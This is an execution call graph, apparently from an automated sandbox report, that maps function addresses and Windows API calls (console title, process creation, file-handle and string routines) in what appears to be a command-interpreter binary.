                                                                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 18315 7ff706ebb3f0 18317 7ff706ebb41a 18315->18317 18316 7ff706ecc2a3 iswdigit 18316->18317 18318 7ff706ecc2b7 18316->18318 18317->18316 18319 7ff706ebb42f 18317->18319 18320 7ff706eb3278 166 API calls 18318->18320 18323 7ff706ebbe00 18319->18323 18322 7ff706ebb461 18320->18322 18324 7ff706ebbec8 18323->18324 18325 7ff706ebbe1b 18323->18325 18324->18322 18325->18324 18326 7ff706ebbe47 memset 18325->18326 18327 7ff706ebbe67 18325->18327 18430 7ff706ebbff0 18326->18430 18329 7ff706ebbe73 18327->18329 18330 7ff706ebbf29 18327->18330 18347 7ff706ebbeaf 18327->18347 18331 7ff706ebbe92 18329->18331 18333 7ff706ebbf0c 18329->18333 18332 7ff706ebcd90 166 API calls 18330->18332 18343 7ff706ebbea1 18331->18343 18357 7ff706ebc620 GetConsoleTitleW 18331->18357 18337 7ff706ebbf33 18332->18337 18468 7ff706ebb0d8 memset 18333->18468 18335 7ff706ebbff0 185 API calls 18335->18324 18338 7ff706ebbf70 18337->18338 18337->18347 18528 7ff706eb88a8 18337->18528 18351 7ff706ebbf75 18338->18351 18585 7ff706eb71ec 18338->18585 18340 7ff706ebbf1e 18340->18347 18346 7ff706ebaf98 2 API calls 18343->18346 18343->18347 18344 7ff706ebbfa9 18344->18347 18348 7ff706ebcd90 166 API calls 18344->18348 18346->18347 18347->18324 18347->18335 18350 7ff706ebbfbb 18348->18350 18350->18347 18352 7ff706ec081c 166 API calls 18350->18352 18353 7ff706ebb0d8 194 API calls 18351->18353 18352->18351 18354 7ff706ebbf7f 18353->18354 18354->18347 18401 7ff706ec5ad8 18354->18401 18358 7ff706ebca2f 18357->18358 18360 7ff706ebc675 18357->18360 18359 7ff706ecc5fc GetLastError 18358->18359 18362 7ff706eb3278 166 API calls 18358->18362 18363 7ff706ec855c ??_V@YAXPEAX 18358->18363 18359->18358 18361 7ff706ebca40 17 API calls 18360->18361 18373 7ff706ebc69b 18361->18373 18362->18358 18363->18358 18364 7ff706ec291c 8 API calls 18367 7ff706ebc762 18364->18367 18365 7ff706ebc9b5 18370 7ff706ec855c ??_V@YAXPEAX 18365->18370 18366 7ff706eb89c0 23 API calls 18371 7ff706ebc964 18366->18371 18367->18358 18367->18364 18369 7ff706ec855c ??_V@YAXPEAX 18367->18369 18367->18371 18385 7ff706ebc83d 18367->18385 18388 7ff706ebc78a wcschr 18367->18388 18390 7ff706ebca25 18367->18390 18393 7ff706ecc684 18367->18393 18395 7ff706ebca2a 18367->18395 18368 7ff706ebc978 towupper 18368->18371 18369->18367 18372 7ff706ebc855 18370->18372 18371->18359 18371->18365 18371->18366 18371->18367 18371->18368 18371->18371 18376 7ff706edec14 173 API calls 18371->18376 18397 7ff706ebca16 GetLastError 18371->18397 18375 7ff706ebc872 18372->18375 18380 7ff706ecc6b8 SetConsoleTitleW 18372->18380 18373->18358 18373->18365 18373->18367 18374 7ff706ebd3f0 223 API calls 18373->18374 18377 7ff706ebc741 18374->18377 18379 7ff706ec855c ??_V@YAXPEAX 18375->18379 18376->18367 18378 7ff706ebc74d 18377->18378 18382 7ff706ebc8b5 wcsncmp 18377->18382 18378->18367 18591 7ff706ebbd38 18378->18591 18381 7ff706ebc87c 18379->18381 18380->18375 18384 7ff706ec8f80 7 API calls 18381->18384 18382->18367 18382->18378 18386 7ff706ebc88e 18384->18386 18599 7ff706ebcb40 18385->18599 18386->18343 18388->18367 18392 7ff706eb3278 166 API calls 18390->18392 18392->18358 18394 7ff706eb3278 166 API calls 18393->18394 18394->18358 18396 7ff706ec9158 7 API calls 18395->18396 18396->18358 18399 7ff706eb3278 166 API calls 18397->18399 18400 7ff706ecc675 18399->18400 18400->18358 18402 7ff706ebcd90 166 API calls 18401->18402 18403 7ff706ec5b12 18402->18403 18404 7ff706ebcb40 166 API calls 18403->18404 18428 7ff706ec5b8b 18403->18428 18406 7ff706ec5b26 18404->18406 18405 7ff706ec8f80 7 API calls 18407 7ff706ebbf99 18405->18407 18408 7ff706ec0a6c 273 API calls 18406->18408 18406->18428 18407->18343 18409 7ff706ec5b43 18408->18409 18410 7ff706ec5bb8 18409->18410 18411 7ff706ec5b48 GetConsoleTitleW 18409->18411 18412 7ff706ec5bf4 18410->18412 18413 7ff706ec5bbd GetConsoleTitleW 18410->18413 18414 7ff706ebcad4 172 API calls 18411->18414 18416 7ff706ecf452 18412->18416 18417 7ff706ec5bfd 18412->18417 18415 7ff706ebcad4 172 API calls 18413->18415 18418 7ff706ec5b66 18414->18418 18419 7ff706ec5bdb 18415->18419 18421 7ff706ec3c24 166 API calls 18416->18421 18423 7ff706ecf462 18417->18423 18424 7ff706ec5c1b 18417->18424 18417->18428 18620 7ff706ec4224 InitializeProcThreadAttributeList 18418->18620 18684 7ff706eb96e8 18419->18684 18421->18428 18427 7ff706eb3278 166 API calls 18423->18427 18426 7ff706eb3278 166 API calls 18424->18426 18425 7ff706ec5b7f 18680 7ff706ec5c3c 18425->18680 18426->18428 18427->18428 18428->18405 18431 7ff706ebc01c 18430->18431 18432 7ff706ebc0c4 18430->18432 18433 7ff706ebc022 18431->18433 18434 7ff706ebc086 18431->18434 18432->18327 18435 7ff706ebc030 18433->18435 18436 7ff706ebc113 18433->18436 18437 7ff706ebc144 18434->18437 18450 7ff706ebc094 18434->18450 18438 7ff706ebc039 wcschr 18435->18438 18448 7ff706ebc053 18435->18448 18443 7ff706ebff70 2 API calls 18436->18443 18436->18448 18439 7ff706ebc151 18437->18439 18455 7ff706ebc1c8 18437->18455 18440 7ff706ebc301 18438->18440 18438->18448 19062 7ff706ebc460 18439->19062 18444 7ff706ebcd90 166 API calls 18440->18444 18441 7ff706ebc0c6 18447 7ff706ebc0cf wcschr 18441->18447 18457 7ff706ebc073 18441->18457 18442 7ff706ebc058 18453 7ff706ebff70 2 API calls 18442->18453 18442->18457 18443->18448 18467 7ff706ebc30b 18444->18467 18446 7ff706ebc460 183 API calls 18446->18450 18451 7ff706ebc1be 18447->18451 18447->18457 18448->18441 18448->18442 18458 7ff706ebc211 18448->18458 18450->18432 18450->18446 18452 7ff706ebcd90 166 API calls 18451->18452 18452->18455 18453->18457 18454 7ff706ebc460 183 API calls 18454->18457 18455->18432 18455->18458 18459 7ff706ebc285 18455->18459 18464 7ff706ebd840 178 API calls 18455->18464 18456 7ff706ebc460 183 API calls 18456->18432 18457->18432 18457->18454 18462 7ff706ebff70 2 API calls 18458->18462 18459->18458 18463 7ff706ebb6b0 170 API calls 18459->18463 18460 7ff706ebb6b0 170 API calls 18460->18448 18461 7ff706ebd840 178 API calls 18461->18467 18462->18432 18465 7ff706ebc2ac 18463->18465 18464->18455 18465->18457 18465->18458 18466 7ff706ebc3d4 18466->18457 18466->18458 18466->18460 18467->18432 18467->18458 18467->18461 18467->18466 18469 7ff706ebca40 17 API calls 18468->18469 18485 7ff706ebb162 18469->18485 18470 7ff706ebb2e1 18471 7ff706ebb303 18470->18471 18472 7ff706ebb2f7 ??_V@YAXPEAX 18470->18472 18474 7ff706ec8f80 7 API calls 18471->18474 18472->18471 18473 7ff706ebb1d9 18477 7ff706ebcd90 166 API calls 18473->18477 18493 7ff706ebb1ed 18473->18493 18476 7ff706ebb315 18474->18476 18475 7ff706ec1ea0 8 API calls 18475->18485 18476->18331 18476->18340 18477->18493 18479 7ff706ebb228 _get_osfhandle 18482 7ff706ebb23f _get_osfhandle 18479->18482 18479->18493 18480 7ff706ecbfef _get_osfhandle SetFilePointer 18483 7ff706ecc01d 18480->18483 18480->18493 18482->18493 18484 7ff706ec33f0 _vsnwprintf 18483->18484 18486 7ff706ecc038 18484->18486 18485->18470 18485->18473 18485->18475 18485->18485 18492 7ff706eb3278 166 API calls 18486->18492 18487 7ff706ecc1c3 18491 7ff706ec33f0 _vsnwprintf 18487->18491 18488 7ff706ec01b8 6 API calls 18488->18493 18489 7ff706ebd208 _close 18489->18493 18490 7ff706ec26e0 19 API calls 18490->18493 18491->18486 18494 7ff706ecc1f9 18492->18494 18493->18470 18493->18479 18493->18480 18493->18487 18493->18488 18493->18489 18493->18490 18495 7ff706ecc060 18493->18495 18497 7ff706ebb038 _dup2 18493->18497 18498 7ff706ecc246 18493->18498 18502 7ff706ebb356 18493->18502 18527 7ff706ecc1a5 18493->18527 19076 7ff706ebaffc _dup 18493->19076 19078 7ff706edf318 _get_osfhandle GetFileType 18493->19078 18496 7ff706ebaf98 2 API calls 18494->18496 18495->18498 18500 7ff706ec09f4 2 API calls 18495->18500 18496->18470 18497->18493 18501 7ff706ebaf98 2 API calls 18498->18501 18499 7ff706ebb038 _dup2 18503 7ff706ecc1b7 18499->18503 18504 7ff706ecc084 18500->18504 18505 7ff706ecc24b 18501->18505 18511 7ff706ebaf98 2 API calls 18502->18511 18507 7ff706ecc1be 18503->18507 18508 7ff706ecc207 18503->18508 18509 7ff706ebb900 166 API calls 18504->18509 18506 7ff706edf1d8 166 API calls 18505->18506 18506->18470 18512 7ff706ebd208 _close 18507->18512 18510 7ff706ebd208 _close 18508->18510 18513 7ff706ecc08c 18509->18513 18510->18502 18514 7ff706ecc211 18511->18514 18512->18487 18515 7ff706ecc094 wcsrchr 18513->18515 18518 7ff706ecc0ad 18513->18518 18516 7ff706ec33f0 _vsnwprintf 18514->18516 18515->18518 18517 7ff706ecc22c 18516->18517 18519 7ff706eb3278 166 API calls 18517->18519 18518->18518 18520 7ff706ecc0e0 _wcsnicmp 18518->18520 18521 7ff706ecc106 18518->18521 18519->18470 18520->18518 18522 7ff706ebff70 2 API calls 18521->18522 18523 7ff706ecc13b 18522->18523 18523->18498 18524 7ff706ecc146 SearchPathW 18523->18524 18524->18498 18525 7ff706ecc188 18524->18525 18526 7ff706ec26e0 19 API calls 18525->18526 18526->18527 18527->18499 18529 7ff706eb88fc 18528->18529 18531 7ff706eb88cf 18528->18531 18529->18338 18532 7ff706ec0a6c 18529->18532 18530 7ff706eb88df _wcsicmp 18530->18531 18531->18529 18531->18530 18533 7ff706ec1ea0 8 API calls 18532->18533 18534 7ff706ec0ab9 18533->18534 18535 7ff706ec0b12 memset 18534->18535 18537 7ff706ecd927 18534->18537 18538 7ff706ec0aee _wcsnicmp 18534->18538 18541 7ff706ec128f ??_V@YAXPEAX 18534->18541 18536 7ff706ebca40 17 API calls 18535->18536 18539 7ff706ec0b5a 18536->18539 18540 7ff706ec081c 166 API calls 18537->18540 18538->18535 18538->18537 18543 7ff706ebb364 17 API calls 18539->18543 18546 7ff706ecd94e 18539->18546 18542 7ff706ecd933 18540->18542 18542->18535 18542->18541 18544 7ff706ec0b6f 18543->18544 18544->18541 18544->18546 18547 7ff706ec0b8c wcschr 18544->18547 18551 7ff706ec0c0f wcsrchr 18544->18551 18558 7ff706ebcd90 166 API calls 18544->18558 18559 7ff706ec081c 166 API calls 18544->18559 18560 7ff706ec3060 171 API calls 18544->18560 18561 7ff706ebd3f0 223 API calls 18544->18561 18562 7ff706ebaf74 170 API calls 18544->18562 18563 7ff706ec0d71 wcsrchr 18544->18563 18565 7ff706ec1ea0 8 API calls 18544->18565 18567 7ff706ec0fb1 wcsrchr 18544->18567 18568 7ff706ec0fd0 wcschr 18544->18568 18571 7ff706ec10fd wcsrchr 18544->18571 18578 7ff706ec2eb4 22 API calls 18544->18578 18581 7ff706ec1087 _wcsicmp 18544->18581 18583 7ff706ecda74 18544->18583 19079 7ff706ec3bac 18544->19079 19083 7ff706ec291c GetDriveTypeW 18544->19083 19086 7ff706ec2efc 18544->19086 18545 7ff706ecd96b ??_V@YAXPEAX 18545->18546 18546->18545 18550 7ff706ecd99a wcschr 18546->18550 18552 7ff706ecda64 18546->18552 18553 7ff706ecd9ca GetFileAttributesW 18546->18553 18555 7ff706ecd9fd ??_V@YAXPEAX 18546->18555 18547->18544 18550->18546 18551->18544 18551->18546 18553->18546 18553->18552 18554 7ff706ecda90 GetFileAttributesW 18554->18546 18556 7ff706ecdaa8 GetLastError 18554->18556 18555->18546 18556->18552 18557 7ff706ecdab9 18556->18557 18557->18546 18558->18544 18559->18544 18560->18544 18561->18544 18562->18544 18563->18544 18564 7ff706ec0d97 NeedCurrentDirectoryForExePathW 18563->18564 18564->18544 18564->18546 18565->18544 18567->18544 18567->18568 18568->18552 18569 7ff706ec0fed wcschr 18568->18569 18569->18544 18569->18552 18571->18544 18572 7ff706ec111a _wcsicmp 18571->18572 18573 7ff706ec1138 _wcsicmp 18572->18573 18574 7ff706ec123d 18572->18574 18573->18574 18575 7ff706ec10c5 18573->18575 18576 7ff706ec1175 18574->18576 18579 7ff706ec1250 ??_V@YAXPEAX 18574->18579 18575->18576 18577 7ff706ec1169 ??_V@YAXPEAX 18575->18577 18580 7ff706ec8f80 7 API calls 18576->18580 18577->18576 18578->18544 18579->18576 18582 7ff706ec1189 18580->18582 18581->18583 18584 7ff706ec10a7 _wcsicmp 18581->18584 18582->18338 18583->18552 18583->18554 18584->18575 18584->18583 18586 7ff706eb7279 18585->18586 18587 7ff706eb7211 _setjmp 18585->18587 18586->18344 18587->18586 18589 7ff706eb7265 18587->18589 19100 7ff706eb72b0 18589->19100 18592 7ff706ebbd6f 18591->18592 18596 7ff706ebbda2 18591->18596 18592->18596 18615 7ff706edeaf0 18592->18615 18594 7ff706ecc4ab 18595 7ff706eb3240 166 API calls 18594->18595 18594->18596 18597 7ff706ecc4bc 18595->18597 18596->18367 18597->18596 18598 7ff706eb3240 166 API calls 18597->18598 18598->18597 18600 7ff706ebcb63 18599->18600 18601 7ff706ebcd90 166 API calls 18600->18601 18602 7ff706ebc848 18601->18602 18602->18372 18603 7ff706ebcad4 18602->18603 18604 7ff706ebcad9 18603->18604 18612 7ff706ebcb05 18603->18612 18605 7ff706ebcd90 166 API calls 18604->18605 18604->18612 18606 7ff706ecc722 18605->18606 18607 7ff706ecc72e GetConsoleTitleW 18606->18607 18606->18612 18608 7ff706ecc74a 18607->18608 18607->18612 18609 7ff706ebb6b0 170 API calls 18608->18609 18614 7ff706ecc778 18609->18614 18610 7ff706ecc7ec 18611 7ff706ebff70 2 API calls 18610->18611 18611->18612 18612->18372 18613 7ff706ecc7dd SetConsoleTitleW 18613->18610 18614->18610 18614->18613 18616 7ff706eb3410 18 API calls 18615->18616 18617 7ff706edeb1e 18616->18617 18618 7ff706ebb998 207 API calls 18617->18618 18619 7ff706edeb2e 18618->18619 18619->18594 18621 7ff706ececd4 GetLastError 18620->18621 18622 7ff706ec42ab UpdateProcThreadAttribute 18620->18622 18623 7ff706ececee 18621->18623 18624 7ff706ececf0 GetLastError 18622->18624 18625 7ff706ec42eb memset memset GetStartupInfoW 18622->18625 18721 7ff706ed9eec 18624->18721 18627 7ff706ec3a90 170 API calls 18625->18627 18629 7ff706ec43a8 18627->18629 18630 7ff706ebb900 166 API calls 18629->18630 18631 7ff706ec43bb 18630->18631 18632 7ff706ec4638 _local_unwind 18631->18632 18636 7ff706ec43cc 18631->18636 18632->18636 18633 7ff706ec43de wcsrchr 18634 7ff706ec43f7 lstrcmpW 18633->18634 18641 7ff706ec4415 18633->18641 18637 7ff706ec4668 18634->18637 18634->18641 18636->18633 18636->18641 18709 7ff706ed9044 18637->18709 18638 7ff706ec441a 18640 7ff706ec442a CreateProcessW 18638->18640 18643 7ff706ec4596 CreateProcessAsUserW 18638->18643 18642 7ff706ec448b 18640->18642 18708 7ff706ec5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 18641->18708 18644 7ff706ec4672 GetLastError 18642->18644 18645 7ff706ec4495 CloseHandle 18642->18645 18643->18642 18653 7ff706ec468d 18644->18653 18646 7ff706ec498c 8 API calls 18645->18646 18647 7ff706ec44c5 18646->18647 18651 7ff706ec44cd 18647->18651 18647->18653 18648 7ff706ec47a3 18648->18425 18649 7ff706ec44f8 18649->18648 18652 7ff706ec4612 18649->18652 18655 7ff706ec5cb4 7 API calls 18649->18655 18650 7ff706ebcd90 166 API calls 18654 7ff706ec4724 18650->18654 18651->18648 18651->18649 18669 7ff706eda250 33 API calls 18651->18669 18656 7ff706ec461c 18652->18656 18658 7ff706ec47e1 CloseHandle 18652->18658 18653->18650 18653->18651 18657 7ff706ec472c _local_unwind 18654->18657 18666 7ff706ec473d 18654->18666 18659 7ff706ec4517 18655->18659 18661 7ff706ebff70 GetProcessHeap RtlFreeHeap 18656->18661 18657->18666 18658->18656 18660 7ff706ec33f0 _vsnwprintf 18659->18660 18662 7ff706ec4544 18660->18662 18663 7ff706ec47fa DeleteProcThreadAttributeList 18661->18663 18665 7ff706ec498c 8 API calls 18662->18665 18664 7ff706ec8f80 7 API calls 18663->18664 18667 7ff706ec4820 18664->18667 18668 7ff706ec4558 18665->18668 18672 7ff706ebff70 GetProcessHeap RtlFreeHeap 18666->18672 18667->18425 18670 7ff706ec4564 18668->18670 18671 7ff706ec47ae 18668->18671 18669->18649 18673 7ff706ec498c 8 API calls 18670->18673 18674 7ff706ec33f0 _vsnwprintf 18671->18674 18675 7ff706ec475b _local_unwind 18672->18675 18676 7ff706ec4577 18673->18676 18674->18652 18675->18651 18676->18656 18677 7ff706ec457f 18676->18677 18678 7ff706eda920 210 API calls 18677->18678 18679 7ff706ec4584 18678->18679 18679->18656 18681 7ff706ec5c45 18680->18681 18682 7ff706ec5c4e 18680->18682 18681->18682 18683 7ff706ecf470 SetConsoleTitleW 18681->18683 18682->18428 18683->18682 18705 7ff706eb9737 18684->18705 18686 7ff706eb977d memset 18688 7ff706ebca40 17 API calls 18686->18688 18687 7ff706ebcd90 166 API calls 18687->18705 18688->18705 18689 7ff706ecb76e 18692 7ff706eb3278 166 API calls 18689->18692 18690 7ff706ecb7b3 18691 7ff706ecb79a 18694 7ff706ec855c ??_V@YAXPEAX 18691->18694 18695 7ff706ecb787 18692->18695 18693 7ff706ebb364 17 API calls 18693->18705 18694->18690 18696 7ff706ecb795 18695->18696 18811 7ff706ede944 18695->18811 18819 7ff706ed7694 18696->18819 18701 7ff706eb986d 18703 7ff706eb9880 ??_V@YAXPEAX 18701->18703 18704 7ff706eb988c 18701->18704 18703->18704 18706 7ff706ec8f80 7 API calls 18704->18706 18705->18686 18705->18687 18705->18689 18705->18690 18705->18691 18705->18693 18705->18701 18723 7ff706ec1fac memset 18705->18723 18750 7ff706ebce10 18705->18750 18800 7ff706eb96b4 18705->18800 18805 7ff706ec5920 18705->18805 18707 7ff706eb989d 18706->18707 18707->18425 18710 7ff706ec3a90 170 API calls 18709->18710 18711 7ff706ed9064 18710->18711 18712 7ff706ed9083 18711->18712 18713 7ff706ed906e 18711->18713 18715 7ff706ebcd90 166 API calls 18712->18715 18714 7ff706ec498c 8 API calls 18713->18714 18720 7ff706ed9081 18714->18720 18716 7ff706ed909b 18715->18716 18717 7ff706ec498c 8 API calls 18716->18717 18716->18720 18718 7ff706ed90ec 18717->18718 18719 7ff706ebff70 2 API calls 18718->18719 18719->18720 18720->18641 18722 7ff706eced0a DeleteProcThreadAttributeList 18721->18722 18722->18623 18725 7ff706ec203b 18723->18725 18724 7ff706ec20b0 18727 7ff706ec3060 171 API calls 18724->18727 18729 7ff706ec211c 18724->18729 18725->18724 18726 7ff706ec2094 18725->18726 18728 7ff706ec20a6 18726->18728 18730 7ff706eb3278 166 API calls 18726->18730 18727->18729 18732 7ff706ec8f80 7 API calls 18728->18732 18729->18728 18731 7ff706ec2e44 2 API calls 18729->18731 18730->18728 18734 7ff706ec2148 18731->18734 18733 7ff706ec2325 18732->18733 18733->18705 18734->18728 18825 7ff706ec2d70 18734->18825 18737 7ff706ebb900 166 API calls 18739 7ff706ec21d0 18737->18739 18738 7ff706ece04a ??_V@YAXPEAX 18738->18728 18739->18738 18740 7ff706ec221c wcsspn 18739->18740 18748 7ff706ec22a4 ??_V@YAXPEAX 18739->18748 18742 7ff706ebb900 166 API calls 18740->18742 18743 7ff706ec223b 18742->18743 18743->18738 18746 7ff706ec2252 18743->18746 18744 7ff706ebd3f0 223 API calls 18744->18748 18745 7ff706ece06d wcschr 18745->18746 18746->18745 18747 7ff706ece090 towupper 18746->18747 18749 7ff706ec228f 18746->18749 18747->18746 18747->18749 18748->18728 18749->18744 18751 7ff706ebd0f8 18750->18751 18782 7ff706ebce5b 18750->18782 18752 7ff706ec8f80 7 API calls 18751->18752 18754 7ff706ebd10a 18752->18754 18753 7ff706ecc860 18755 7ff706ecc97c 18753->18755 18758 7ff706edee88 390 API calls 18753->18758 18754->18705 18757 7ff706ede9b4 197 API calls 18755->18757 18759 7ff706ecc981 longjmp 18757->18759 18760 7ff706ecc879 18758->18760 18761 7ff706ecc99a 18759->18761 18762 7ff706ecc882 EnterCriticalSection LeaveCriticalSection 18760->18762 18763 7ff706ecc95c 18760->18763 18761->18751 18764 7ff706ecc9b3 ??_V@YAXPEAX 18761->18764 18766 7ff706ebd0e3 18762->18766 18763->18755 18767 7ff706eb96b4 186 API calls 18763->18767 18764->18751 18766->18705 18767->18763 18768 7ff706ebceaa _tell 18770 7ff706ebd208 _close 18768->18770 18769 7ff706ebcd90 166 API calls 18769->18782 18770->18782 18771 7ff706ecc9d5 18909 7ff706edd610 18771->18909 18773 7ff706ebb900 166 API calls 18773->18782 18775 7ff706ecca07 18776 7ff706ede91c 198 API calls 18775->18776 18781 7ff706ecca0c 18776->18781 18777 7ff706edbfec 176 API calls 18778 7ff706ecc9f1 18777->18778 18780 7ff706eb3240 166 API calls 18778->18780 18779 7ff706ebcf33 memset 18779->18782 18780->18775 18781->18705 18782->18751 18782->18753 18782->18761 18782->18766 18782->18769 18782->18771 18782->18773 18782->18779 18783 7ff706ebca40 17 API calls 18782->18783 18784 7ff706ebd184 wcschr 18782->18784 18785 7ff706edbfec 176 API calls 18782->18785 18786 7ff706ebd1a7 wcschr 18782->18786 18787 7ff706ecc9c9 18782->18787 18790 7ff706ec0a6c 273 API calls 18782->18790 18791 7ff706ebbe00 635 API calls 18782->18791 18792 7ff706ec3448 166 API calls 18782->18792 18793 7ff706ebcfab _wcsicmp 18782->18793 18794 7ff706ec0580 12 API calls 18782->18794 18798 7ff706ec1fac 238 API calls 18782->18798 18799 7ff706ebd044 ??_V@YAXPEAX 18782->18799 18835 7ff706ec0494 18782->18835 18848 7ff706ebdf60 18782->18848 18868 7ff706ed778c 18782->18868 18899 7ff706edc738 18782->18899 18783->18782 18784->18782 18785->18782 18786->18782 18788 7ff706ec855c ??_V@YAXPEAX 18787->18788 18788->18751 18790->18782 18791->18782 18792->18782 18793->18782 18795 7ff706ebd003 GetConsoleOutputCP GetCPInfo 18794->18795 18796 7ff706ec04f4 3 API calls 18795->18796 18796->18782 18798->18782 18799->18782 18801 7ff706ecb6e2 RevertToSelf CloseHandle 18800->18801 18802 7ff706eb96c8 18800->18802 18803 7ff706eb96ce 18802->18803 18804 7ff706eb6a48 184 API calls 18802->18804 18803->18705 18804->18802 18806 7ff706ec5a12 18805->18806 18807 7ff706ec596c 18805->18807 18806->18705 18807->18806 18808 7ff706ec598d VirtualQuery 18807->18808 18808->18806 18810 7ff706ec59ad 18808->18810 18809 7ff706ec59b7 VirtualQuery 18809->18806 18809->18810 18810->18806 18810->18809 18812 7ff706ede954 18811->18812 18813 7ff706ede990 18811->18813 18815 7ff706edee88 390 API calls 18812->18815 18814 7ff706ede9b4 197 API calls 18813->18814 18816 7ff706ede995 longjmp 18814->18816 18817 7ff706ede964 18815->18817 18817->18813 18818 7ff706eb96b4 186 API calls 18817->18818 18818->18817 18823 7ff706ed76a3 18819->18823 18820 7ff706ed76b7 18822 7ff706ede9b4 197 API calls 18820->18822 18821 7ff706eb96b4 186 API calls 18821->18823 18824 7ff706ed76bc longjmp 18822->18824 18823->18820 18823->18821 18826 7ff706ec2da3 18825->18826 18827 7ff706ec2d89 18825->18827 18826->18827 18829 7ff706ec2dbc GetProcessHeap RtlFreeHeap 18826->18829 18830 7ff706ec21af 18827->18830 18831 7ff706ec2e0c 18827->18831 18829->18826 18829->18827 18830->18737 18832 7ff706ec2e11 18831->18832 18833 7ff706ec2e32 18831->18833 18832->18833 18834 7ff706ece494 VirtualFree 18832->18834 18833->18827 18836 7ff706ec04a4 18835->18836 18837 7ff706ec26e0 19 API calls 18836->18837 18838 7ff706ec04b9 _get_osfhandle SetFilePointer 18836->18838 18839 7ff706ecd845 18836->18839 18840 7ff706ecd839 18836->18840 18842 7ff706eb3278 166 API calls 18836->18842 18837->18836 18838->18782 18841 7ff706edf1d8 166 API calls 18839->18841 18843 7ff706eb3278 166 API calls 18840->18843 18844 7ff706ecd837 18841->18844 18845 7ff706ecd819 _getch 18842->18845 18843->18844 18845->18836 18846 7ff706ecd832 18845->18846 18918 7ff706edbde4 EnterCriticalSection LeaveCriticalSection 18846->18918 18849 7ff706ebdfe2 18848->18849 18850 7ff706ebdf93 18848->18850 18852 7ff706ebe100 VirtualFree 18849->18852 18853 7ff706ebe00b _setjmp 18849->18853 18850->18849 18851 7ff706ebdf9f GetProcessHeap RtlFreeHeap 18850->18851 18851->18849 18851->18850 18852->18849 18854 7ff706ebe04a 18853->18854 18862 7ff706ebe0c3 18853->18862 18919 7ff706ebe600 18854->18919 18856 7ff706ebe073 18857 7ff706ebe081 18856->18857 18858 7ff706ebe0e0 longjmp 18856->18858 18928 7ff706ebd250 18857->18928 18859 7ff706ebe0b0 18858->18859 18859->18862 18959 7ff706edd3fc 18859->18959 18862->18768 18865 7ff706ebe600 473 API calls 18866 7ff706ebe0a7 18865->18866 18866->18859 18867 7ff706edd610 167 API calls 18866->18867 18867->18859 18886 7ff706ed77bc 18868->18886 18869 7ff706ed7aca 18872 7ff706ec34a0 166 API calls 18869->18872 18870 7ff706ed79c0 18876 7ff706ec34a0 166 API calls 18870->18876 18874 7ff706ed7adb 18872->18874 18873 7ff706ed7ab5 18877 7ff706ec3448 166 API calls 18873->18877 18879 7ff706ed7af0 18874->18879 18883 7ff706ec3448 166 API calls 18874->18883 18875 7ff706ed7984 18875->18870 18880 7ff706ed7989 18875->18880 18882 7ff706ed79d6 18876->18882 18892 7ff706ed79ef 18877->18892 18878 7ff706ed7a00 18884 7ff706ed7a0b 18878->18884 18878->18892 18898 7ff706ed7a33 18878->18898 18881 7ff706ed778c 166 API calls 18879->18881 18880->18892 19055 7ff706ed76e0 18880->19055 18885 7ff706ed7afb 18881->18885 18887 7ff706ec3448 166 API calls 18882->18887 18897 7ff706ed79e7 18882->18897 18883->18879 18889 7ff706ec34a0 166 API calls 18884->18889 18884->18892 18885->18880 18890 7ff706ec3448 166 API calls 18885->18890 18886->18869 18886->18870 18886->18873 18886->18875 18886->18878 18886->18880 18886->18892 18893 7ff706ec3448 166 API calls 18886->18893 18895 7ff706ed778c 166 API calls 18886->18895 18887->18897 18894 7ff706ed7a23 18889->18894 18890->18880 18891 7ff706ec3448 166 API calls 18891->18892 18892->18782 18893->18886 18896 7ff706ed778c 166 API calls 18894->18896 18895->18886 18896->18897 19051 7ff706ed7730 18897->19051 18898->18891 18900 7ff706edc775 18899->18900 18906 7ff706edc7ab 18899->18906 18901 7ff706ebcd90 166 API calls 18900->18901 18902 7ff706edc781 18901->18902 18903 7ff706edc8d4 18902->18903 18904 7ff706ebb0d8 194 API calls 18902->18904 18903->18782 18904->18903 18905 7ff706ebb6b0 170 API calls 18905->18906 18906->18902 18906->18903 18906->18905 18907 7ff706ebb038 _dup2 18906->18907 18908 7ff706ebd208 _close 18906->18908 18907->18906 18908->18906 18910 7ff706edd635 18909->18910 18911 7ff706edd63d 18909->18911 18914 7ff706edd672 longjmp 18910->18914 18915 7ff706ecc9da 18910->18915 18912 7ff706edd658 18911->18912 18913 7ff706edd64a 18911->18913 18912->18910 18917 7ff706eb3278 166 API calls 18912->18917 18916 7ff706eb3278 166 API calls 18913->18916 18914->18915 18915->18775 18915->18777 18916->18910 18917->18910 18920 7ff706ebe60f 18919->18920 18921 7ff706ecccca longjmp 18920->18921 18977 7ff706ebef40 18920->18977 18925 7ff706ebe637 18921->18925 18923 7ff706ebe626 18923->18921 18923->18925 18924 7ff706ec3448 166 API calls 18926 7ff706ecccfe 18924->18926 18925->18924 18927 7ff706ebe65f 18925->18927 18926->18856 18927->18856 18929 7ff706ebd267 18928->18929 18934 7ff706ebd2d3 18928->18934 18930 7ff706ebd284 _wcsicmp 18929->18930 18936 7ff706ebd2a6 18929->18936 18932 7ff706ebd32b 18930->18932 18930->18936 18931 7ff706ebe600 473 API calls 18931->18934 18935 7ff706ebe600 473 API calls 18932->18935 18932->18936 18933 7ff706ebd316 18933->18859 18933->18865 18934->18929 18934->18931 18937 7ff706ebd305 18934->18937 18935->18932 18936->18933 18938 7ff706ebef40 472 API calls 18936->18938 18937->18933 18939 7ff706ebe600 473 API calls 18937->18939 18944 7ff706ebedf8 18938->18944 18939->18929 18940 7ff706ecd0a2 longjmp 18941 7ff706ecd0c5 18940->18941 18942 7ff706ec3448 166 API calls 18941->18942 18943 7ff706ecd0d4 18942->18943 18944->18940 18944->18941 18945 7ff706ebee68 18944->18945 18946 7ff706ebeeb1 18944->18946 18948 7ff706ebef40 472 API calls 18945->18948 18949 7ff706ebe600 473 API calls 18946->18949 18954 7ff706ebeec2 18946->18954 18958 7ff706ebeece 18946->18958 18947 7ff706ebcd90 166 API calls 18950 7ff706ebeee7 18947->18950 18948->18933 18949->18946 18951 7ff706ebef31 18950->18951 18952 7ff706ebeeef 18950->18952 18953 7ff706ede91c 198 API calls 18951->18953 18955 7ff706ebe600 473 API calls 18952->18955 18956 7ff706ebef36 18953->18956 18957 7ff706ebef40 472 API calls 18954->18957 18955->18933 18956->18940 18957->18958 18958->18933 18958->18947 18974 7ff706edd419 18959->18974 18960 7ff706eccadf 18961 7ff706edd576 18962 7ff706edd592 18961->18962 18972 7ff706edd555 18961->18972 